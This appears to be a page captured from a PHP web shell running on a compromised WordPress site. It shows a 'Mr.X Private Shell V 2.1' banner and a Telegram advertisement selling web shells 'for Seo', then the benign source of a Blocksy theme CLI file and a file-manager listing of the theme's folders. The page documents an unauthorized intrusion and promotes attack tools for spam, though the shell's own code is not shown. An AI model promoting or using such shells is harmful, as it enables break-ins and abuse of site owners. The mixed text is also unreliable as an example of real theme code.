__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Blocksy;
/*
add_action('blocksy:customizer:load:before', function () {
$_REQUEST['wp_customize'] = 'on';
_wp_customize_include();
global $wp_customize;
$wp_customize->wp_loaded();
});
*/
/**
* Manages Blocksy theme extensions, tools, license activation, and starter site installation.
*
* ## EXAMPLES
*
* # List all available extensions
* $ wp blocksy extension list
*
* # Activate an extension
* $ wp blocksy extension activate custom-fonts
*
* # Deactivate an extension
* $ wp blocksy extension deactivate custom-fonts
*
* # List all available tools
* $ wp blocksy tool list
*
* # Run a specific tool
* $ wp blocksy tool run tool-name
*
* # List all available demos
* $ wp blocksy demo list
*
* # Install a demo
* $ wp blocksy demo install demo-name
*
* # Activate license
* $ wp blocksy license activate your-license-key
*
* # Move all widgets to inactive area
* $ wp blocksy widgets drop
*/
class Cli {
public function __construct() {
\WP_CLI::add_command('blocksy', $this);
new DemoCli();
new ToolCli();
new LicenseCli();
new ExtensionCli();
new WidgetsCli();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cli | Folder | 0775 |
|
|
| extensions | Folder | 0775 |
|
|
| features | Folder | 0775 |
|
|
| helpers | Folder | 0775 |
|
|
| includes | Folder | 0775 |
|
|
| views | Folder | 0775 |
|
|
| autoload.php | File | 5.95 KB | 0775 |
|
| cache-reset-manager.php | File | 1.87 KB | 0775 |
|
| cli.php | File | 1.19 KB | 0775 |
|
| dashboard.php | File | 15.66 KB | 0775 |
|
| theme-integration.php | File | 9.86 KB | 0775 |
|